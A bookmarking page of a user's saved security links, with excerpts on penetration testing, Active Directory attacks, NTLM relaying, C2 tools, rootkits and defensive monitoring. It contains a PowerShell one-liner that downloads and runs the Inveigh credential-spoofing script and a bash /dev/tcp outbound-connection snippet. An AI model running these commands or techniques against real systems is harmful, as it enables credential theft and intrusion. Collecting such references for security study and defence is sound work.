whip_lash + security   555

RedTeam_CheatSheet.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
yesterday by whip_lash
Categorizing and Enriching Security Events in an ELK with the Help of Sysmon and ATT&CK
Thanks to the recent update to Sysmon (Version 8.0), tagging Sysmon rules is now possible, and makes things much easier to add extra metadata to Sysmon events.
sysmon  security  monitoring 
7 days ago by whip_lash
SANS Penetration Testing | Pen Test Poster: "White Board" - Bash - Useful IPv6 Pivot | SANS Institute
IPv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I've seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.
ipv6  pentest  security 
7 days ago by whip_lash
Car Hacking: The definitive source
Instead of buying books or paying exorbitant amounts of money to learn about car hacking, we (Charlie Miller and Chris Valasek) decided to publish all our tools, data, research notes, and papers to everyone for FREE! Feel free to reach out if you have any questions. If you're nice enough we may actually send you one of our IDBs ;)
car  hacking  security 
8 days ago by whip_lash
Netflix/security_monkey: Security Monkey
Security Monkey monitors your AWS and GCP accounts for policy changes and alerts on insecure configurations. Support is available for OpenStack public and private clouds. Security Monkey can also watch and monitor your GitHub organizations, teams, and repositories.
aws  devops  github  monitoring  security 
11 days ago by whip_lash
Hexacorn | Blog
If you run ‘powershell <0x2000 spaces> calc’ you will spawn Windows Calculator.

What will you see in the logs?

This:

JUST A POWERSHELL COMMANDLINE
obfuscation  logging  pentest  windows  security 
15 days ago by whip_lash
InitString / evil-ssdp · GitLab
Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page.
ssdp  upnp  security  pentest  github 
15 days ago by whip_lash
Bypassing SQL Server Logon Trigger Restrictions
Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties.
database  pentest  security  mssql  MySQL  sql 
15 days ago by whip_lash
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
hash  ntlm  relay  windows  pentest  security 
16 days ago by whip_lash
SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec at http://pen-testing.sans.org/blog/2013/03/27/psexec-python-rocks. It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET!
impacket  python  security  smb  relay  ntlm  hash  script  pentest 
16 days ago by whip_lash
calebmadrigal/trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.
network  python  security  wifi  wireless  pentest  github 
16 days ago by whip_lash
ufrisk/pcileech: Direct Memory Access (DMA) Attack Software
PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system.

PCILeech works without hardware together with memory dump files and the Windows 7/2008R2 x64 Total Meltdown / CVE-2018-1038 vulnerability.
memory  security  github  hardware 
16 days ago by whip_lash
Homas/ioc2rpz: ioc2rpz is a place where threat intelligence meets DNS.
ioc2rpz transforms IOC feeds into response policy zones (RPZ). You can mix feeds to generate a single RPZ or multiple RPZs. Trusted domains and IPs can be whitelisted. ioc2rpz supports expiration of indicators and accordingly rebuilds zones.
dns  security  github 
16 days ago by whip_lash
Cymmetria/honeycomb: An extensible honeypot framework
Honeycomb is an open-source honeypot framework created by Cymmetria.

Honeycomb allows running honeypots with various integrations from a public library of plugins from https://github.com/Cymmetria/honeycomb_plugins

Writing new honeypot services and integrations for honeycomb is super easy! See the plugins repo for more info.
honeypot  security  github 
16 days ago by whip_lash
jzadeh/chiron-elk
CHIRON is a home analytics based on ELK stack combined with Machine Learning threat detection framework AKTAION. CHIRON parses and displays data from P0f, Nmap, and BRO IDS. CHIRON is designed for home use and will give great visibility into home internet devices (IOT, Computers, Cellphones, Tablets, etc).
github  lab  security  securityonion 
16 days ago by whip_lash
sense-of-security/ADRecon: ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis.
security  pentest  activedirectory  github 
16 days ago by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks | SANS Institute
Favorite tweet:

SANS | #PenTest Blog

Modern Web App Pen Testing Part 2, Hash Length Extension Attacks
by @adriendb (SEC642)

Blog: https://t.co/8TR2Z7OKYu pic.twitter.com/3YA3ncesym

— SANS Pen Test (@SANSPenTest) June 28, 2018
hashextension  hash  webapp  pentest  security 
16 days ago by whip_lash
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI – Security Stuff
Learning from these incidents, and the requirements inherent to them (ability to deploy tools and get data rapidly, use only built in tools, has to be usable and deployable by people who probably haven't slept in a week) I developed an Incident Response dashboard that I liked so much I personally used it to "hunt" on all the engagements in the later part of my Incident Response Consultant tenure. Many of the customers liked it so much that they have kept it in their environments to use for proactive threat hunting and log analysis.
defense  dfir  security  windows 
18 days ago by whip_lash
Microsoft COM for Windows - Privilege Escalation
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
 
privesc  windows  pentest  exploit  security 
20 days ago by whip_lash
Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses | McAfee Blogs
In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.
pentest  security 
24 days ago by whip_lash
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
The "executive summary" version of a Golden Ticket is that if you can obtain one of the encryption keys used by the krbtgt account for an Active Directory domain, Mimikatz 2.0 will allow you to forge arbitrary Kerberos authentication tickets for that domain. Those keys are not easily-obtained — unless someone has left an NTDS.DIT backup lying around, it probably requires access to a domain admin account's credentials — so the Golden Ticket functionality is sort of like the "New Game+" mode in the Silent Hill series: you've already won, and now you can play through again as an unstoppable juggernaut with a laser pistol and/or chainsaw.
activedirectory  mimikatz  goldenticket  pentest  security 
24 days ago by whip_lash
One-Lin3r v1.1 - Gives You One-Liners That Aids In Penetration Testing Operations - KitPloit - PenTest Tools for your Security Arsenal ☣
Favorite tweet:

#OneLin3r v1.1 - Gives You One-Liners That Aids In Penetration #Testing Operations https://t.co/AWvpLnt1ND pic.twitter.com/74zGjoV9Ve

— ☣ The Hacker Tools (@KitPloit) June 14, 2018
pentest  security  tool 
28 days ago by whip_lash
Pentester's Windows NTFS Tricks Collection | SEC Consult
Moreover, it’s possible that an administrator or a program configures such permissions and assumes that users are really not allowed to create folders in it.

This ACL can be bypassed as soon as a user can create files. Adding “::$INDEX_ALLOCATION” to the end of a filename will create a folder instead of a file and Windows currently doesn’t include a check for this corner case.

As shown above, a directory was successfully created and the user can create arbitrary files or folders in this directory (which can lead to privilege escalation if an administrator/program assumes that this is not possible because of the missing permissions).
ntfs  windows  privesc  privilegeescalation  security  whitelist-evasion 
4 weeks ago by whip_lash
rmikehodges/hideNsneak
This application assists in managing attack infrastructure by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls.
github  cloud  pentest  security 
5 weeks ago by whip_lash
Introducing Merlin — A cross-platform post-exploitation HTTP/2 Command & Control Tool
tl;dr Evade network detection during a penetration test/red team exercise by using a protocol that existing tools aren’t equipped to understand or inspect.
security  pentest  c2  c&c  merlin 
7 weeks ago by whip_lash
Ne0nd0g/merlin: Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.
Download the latest version of Merlin Server from the releases section
Extract the files with 7zip using the x function. The password is: merlin
Start Merlin
Deploy an agent. See Agent Execution Quick Start Guide for examples
Pwn, Pivot, Profit
agent  c2  c&c  merlin  github  pentest  security 
7 weeks ago by whip_lash
f0rb1dd3n/Reptile: LKM Linux rootkit
Give root to unprivileged users
Hide files and directories
Hide files contents
Hide processes
Hide itself
Hidden boot persistence
ICMP/UDP/TCP port-knocking backdoor
Full TTY/PTY shell with file transfer
Client to handle Reptile Shell
kernel  linux  security 
7 weeks ago by whip_lash
Extracting SSH Private Keys from Windows 10 ssh-agent
Favorite tweet:

New blogpost: extracting unencrypted private SSH keys from Windows 10's new builtin ssh-agent service

Had some fun this weekend playing with the new OpenSSH utilities on Windows 10. Might be useful for pentesters/redteamers :)https://t.co/Xn47rTfVQc

— Ronnie Flathers (@ropnop) May 20, 2018
security  ssh  pentest 
7 weeks ago by whip_lash
!exploitable Crash Analyzer - MSEC Debugger Extensions - CodePlex Archive
The tool first creates hashes to determine the uniqueness of a crash and then assigns an exploitability rating to the crash: Exploitable, Probably Exploitable, Probably Not Exploitable, or Unknown.
security  Microsoft  debugger  windbg  exploit  development 
9 weeks ago by whip_lash
Advanced Web Shell (Full Sources) : netsec
There are multiple things that make DAws better than every Web Shell out there
webshell  webapp  pentesting  security 
9 weeks ago by whip_lash
Lab of a Penetration Tester: Silently turn off Active Directory Auditing using DCShadow
One very interesting thing which I recently discovered is the ability to DCShadow to modify System Access Control List or SACL. When we enable auditing on success or failure on an AD object, an entry (called ACE - Access Control Entry) is added to the SACL of that object. The permissions to an object are controlled by a DACL. For example, we modified DACL of AdminSDHolder in the previous post for persistence.
activedirectory  pentest  security  dcshadow 
10 weeks ago by whip_lash
Escalating privileges with ACLs in Active Directory | Fox-IT International blog
This blogpost describes a scenario where our standard attack methods did not
work and where we had to dig deeper in order to gain high privileges in the domain.
We describe more advanced privilege escalation attacks using Access Control Lists
and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx
that automate the steps for this advanced attack.
activedirectory  windows  pentest  privilegeescalation  security 
11 weeks ago by whip_lash
Malicious Network Traffic From /bin/bash - SANS Internet Storm Center
exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5
cat <&5
exec 5>&-
bash  c2  networking  hacking  pentest  security  linux  postexploitation 
11 weeks ago by whip_lash
How to prevent bypassing AppLocker using Alternate Data Streams – Gunnar Haslinger
So, what’s the trick to bypass AppLocker: We copy the contents of an executable to an Alternate Data Stream of the logs-directory. To be clear: Not to a file in the logs-directory, but to an ADS of the logs-directory itself! The copy-job is done using the “type” command redirecting the output to an ADS. The execution of an ADS can be done by various ways, one way would be to use wmic to create a new process, but there are other ways too.
pentest  security  windows  postexploitation  whitelist-evasion 
12 weeks ago by whip_lash
bohops on Twitter: "Is Explorer.exe the ultimate #lolbin? explorer.exe [exe/hta/scr/...etc] *Invokes child processes when called (after a lookup of the the default program handler) *Hides from the default filter in AutoRuns *Just might be doing a little m
Favorite tweet:

Is Explorer.exe the ultimate #lolbin?

explorer.exe [exe/hta/scr/...etc]

*Invokes child processes when called (after a lookup of the default program handler)
*Hides from the default filter in AutoRuns
*Just might be doing a little more on a workstation in your network#DFIR pic.twitter.com/3YmafQmkqs

— bohops (@bohops) April 19, 2018
Twitter  pentest  security  windows  postexploitation  whitelist-evasion 
12 weeks ago by whip_lash
GitHub - api0cradle/LOLBAS: Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Favorite tweet:

A good documentation on all the different #LOLBins and #LOLScripts would be nice? Right?

Good thing I have started then. Still have a lot of notes to add, but I feel this is a good start. Would love community feedback and contributions.

Is this useful?https://t.co/fGjsX76BEH pic.twitter.com/oYPhvDdGyq

— Oddvar Moe [MVP] (@Oddvarmoe) April 19, 2018
Twitter  pentest  security  livingofftheland  whitelist-evasion  postexploitation  windows 
12 weeks ago by whip_lash
Securing DNS across all of my devices with Pi-Hole + DNS-over-HTTPS + 1.1.1.1
Of course you can't simply use this as a DNS resolver, you need something to sit in the middle and speak DNS to your clients and DoH to a provider upstream that answer DoH queries. For that I'm going to use a Pi-Hole and get some extra bang for my buck.
dns  privacy  security 
april 2018 by whip_lash
Dumping Clear-Text Credentials | Penetration Testing Lab
The article contains Windows locations where passwords might exist and techniques to retrieve them.
passwords  windows  security  pentest  postexploitation 
april 2018 by whip_lash
OS Command Injection; The Pain, The Gain - Black Hills Information Security
I was confused. I definitely had command injection but nothing was working. I finally figured out that the command length was limited to 32 characters, likely because it was being written to a database first. I discovered this by sending the ping command over and over again with varying numbers of spaces until it stopped working.
security  commandinjection  pentest 
march 2018 by whip_lash
GitHub - eladshamir/Internal-Monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Mimikatz
The Internal Monologue Attack flow is described below:

Disable NetNTLMv1 preventive controls by changing LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic to appropriate values, as described above.
Retrieve all non-network logon tokens from currently running processes and impersonate the associated users.
For each impersonated user, interact with NTLM SSP locally to elicit a NetNTLMv1 response to the chosen challenge in the security context of the impersonated user.
Restore the original values of LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic.
Crack the NTLM hash of the captured responses using rainbow tables.
Pass the Hash.
hash  postexploitation  pentest  security  github 
march 2018 by whip_lash
Top Five Ways I gained access to Your Corporate Wireless Network (Lo0tBo0ty KARMA edition)
I’ve been able to snag credentials for EAP and TTLS networks, where other Evil Twins fail. A set of valid user credentials can allow privilege escalation and persistence that can sometimes take a red team weeks to establish.
wireless  pentest  security 
march 2018 by whip_lash
Introducing Metta: Uber’s Open Source Tool for Adversarial Simulation
Today, Uber announced the open-source release of Metta, a tool for basic adversarial simulation. Modern software techniques such as end-to-end functional testing and test-driven development work well for software design, and these same techniques can be applied to detection systems. In fact, Metta was born from multiple internal projects where we’d already brought DevOps concepts to our detection rules.
devops  hacking  opensource  security  purpleteam  metta 
march 2018 by whip_lash
Analysis of a Kubernetes hack — Backdooring through kubelet
There are two ports that kubelet listens on, 10255 and 10250. The former is a read only HTTP port and the latter is an HTTPS port that can essentially do whatever you want.
containers  kubernetes  security 
march 2018 by whip_lash